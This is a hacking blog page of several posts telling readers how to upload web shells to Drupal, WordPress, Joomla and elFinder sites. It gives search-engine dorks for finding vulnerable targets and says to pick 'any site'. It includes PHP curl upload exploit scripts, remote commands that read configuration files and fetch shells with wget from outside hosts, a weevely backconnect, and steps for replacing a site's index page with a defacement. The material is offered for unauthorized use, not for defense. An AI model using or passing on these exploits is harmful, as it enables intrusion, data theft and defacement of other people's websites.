[GUIDE] How to Upload Shell on Drupal Sites

Steps

      1- Go to Modules>List

      2-Search for "PHP"

      3-☑ PHP Filter | Allows embedded PHP code/snippets to be evaluated.

      4-Save Configuration

      5-Add/edit content

      6-Paste Uploader script in body

      7-Change text format to PHP Code

      8-Save

Videos

Read more

by Malik korrich ~ mercredi 31 décembre 2014 0 commentaires

Exploit Wordpress: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass

Uploading Shell

Requirement:
    1-Python Any Version (v2.7 recommended)
    2-Exploit Script
    3-Backdoor

Steps:
    1- Download Exploit

        wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt

    2- Change to executable Python extension

        mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py

    3- Find Vulnerable Target using dork

        inurl:/plugins/wpdatatables
        inurl:codecanyon-3958969
        index of "wpdatatables"
        index of "codecanyon-3958969"

    4- Open cmd/terminal and run exploit wptable.py

        python wpdatatables_shell_up.py -t targetsite.com -f shell.php

    5- Shell Upload to

        http://targetsite.com/wp-content/YEAR/MONTH/shell.php

Bypassing Not Acceptable

Requirements:
    1- Weevely Stealth Shell
    2- Remote Deface Script (.txt)


Steps:
    1- Upload weevely stealth shell using the exploit script

    2- Backconnect using weevely

    3- CD to root directory

    4- Backup index.php

        mv index.php indexBAK.php

    5- Import Deface Script

        wget http://yourhosting.com/index.txt -O index.php

Read more

by Malik korrich ~ lundi 24 novembre 2014 0 commentaires

[JOOMLA] JomSocial 2.6 Remote Code Execution

Dork:

inurl:/index.php?option=com_community

Procedure
   1- Copy the dork and paste it on Google or any other search engine
   2- Chose any site
   3- Run the JomSocial Exploiter by Gothie
   4- Paste the site URL in the given textbox and click Connect

   5-If site is vulnerable, you will get the message as below

   6- Now, you can execute any command remotely. The commands are as below:

system('id & uname -a');

 system('ls');

system('cat configuration.php');

    7- To upload shell, you need to have raw shell (shell.txt) uploaded anywhere and can be access directly without executing it. Type in the command below to import your shell and save it as .php

system('wget http://socialmediasuccesstools.com/shell.txt -O shell.php');

   8- Your shell can be found at http://victim.com/shell.php

Downloads

JomSocial Exploiter by Gothie (2.7MB) 

Read more

by Malik korrich ~ mercredi 29 octobre 2014 0 commentaires

Wordpress 0day Exploiter [Original]

Wordpress 0day Exploiter
Wordpress 0day Exploiter is a tool that enable you to register as new admin on a wordpress site which have the bug on the Ajax.php file.

 How to create dorks?
It's very easy so create the dorks, the list of vulnerable themes are already provided on the right richtext box. So, you just need to add the theme name.

Dork:

inurl:/wp-content/themes/[theme_name]

Example:

inurl:/wp-content/themes/appius

How to use the tools?
It's easy, once you have found your target, 

1- Simply paste the site URL,theme name, an your email in the textbox

2- Click on Confirm > Exploit

3- If your target is vulnerable, the "Register" button will be enabled

4- Click on Register and the webbrowser will bring you to the registration page

5- Enter your username and email

6- Check your email inbox for the confirmation and the password for your account.

7- Login to the site and there you go :)

8- You also can upload shell into the site. [How to upload shell in Wordpress site] 

  Download / Mirror

Read more

by Malik korrich ~ lundi 29 septembre 2014 0 commentaires

Exploit Elfinder - Shell Upload Vulnerability

Dork:

inurl:/elfinder/ intitle:index of

Steps:
1- Copy the dork and paste in google

2- Choose any site

3- Find for elfinder.html or elfinder.php.html

   

4- Upload your file

5- If your file successfully uploaded, it will be in the same directory. Double click on your file to see its result

Thats all :)

Read more

by Malik korrich ~ dimanche 22 juin 2014 0 commentaires

Exploit Joomla!: JCE

It has been a very long time that i haven't post here, so as for today i'm going to post a new tutorial on how to upload shell with method JCE.

Thing Required:
JCE Exploiter : DOWNLOAD 

DORKS:

 inurl:"images/stories" php
"index of /images/stories/powered_by.png"
"index of /images/stories/joomla-dev_cycle.png"
"index of /images/stories/food"
"index of /images/stories/fruit"
inurl:"/images/stories/food"
inurl:"/images/stories/fruit"
inurl:index.php?option=com_jce
inurl:index.php?option=com_virtuemart
inurl:joomla/index.php?option=com_virtuemart

Steps:
1- Copy any of the dorks, and paste on google

2  - Choose any site

  

3 - Open up JCE.exe

 4 - Paste the site that you chose in the textbox

 5 - Click on START

6 - If the shell successfully upload, you will get the link to the shell

7 - Go to the given url, and upload your shell

 
 Video

Video by Tentera Siber Legion

Read more

by Malik korrich ~ jeudi 19 juin 2014 0 commentaires

Exploit Wordpress: Echea Theme - File Upload Vulnerability

Dork: inurl:/wp-content/themes/echea/

Shell Uploaded to: 
http://www.site.com/wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg 

Exploit:

$uploadfile="shell.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/themes/echea/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?> 

This exploit is the same as my previous post, so check it! :P

Read more

by Malik korrich ~ jeudi 15 mai 2014 0 commentaires

Exploit Wordpress:Complete Gallery Manager 3.3.3 - File Upload Vulnerability

Things Required:
-XAMPP
-Shell
-Exploit script.php

Dork: inurl/wp-content/plugins/complete-gallery-manager
Shell Uploaded to : http://wordpress.com/wp-content/2013/09/up.php

Exploit :

$uploadfile="up.php";
$ch =
curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Just watch the video if you still don't understand :)

 

Read more

by Malik korrich ~ 0 commentaires

Exploit Wordpress: Salespresspro Theme - File Upload Vulnerability

POC:
Dork: inurl:/themes/salespresspro
          inurl:/wp-content/themes/salespresspro/

Exploit: /wp-content/themes/salespresspro/headerimgbgblog-upload.php  

This exploit is the same as the previous exploit that i posted, please check them if you can't understand.

  

Read more

by Malik korrich ~ 0 commentaires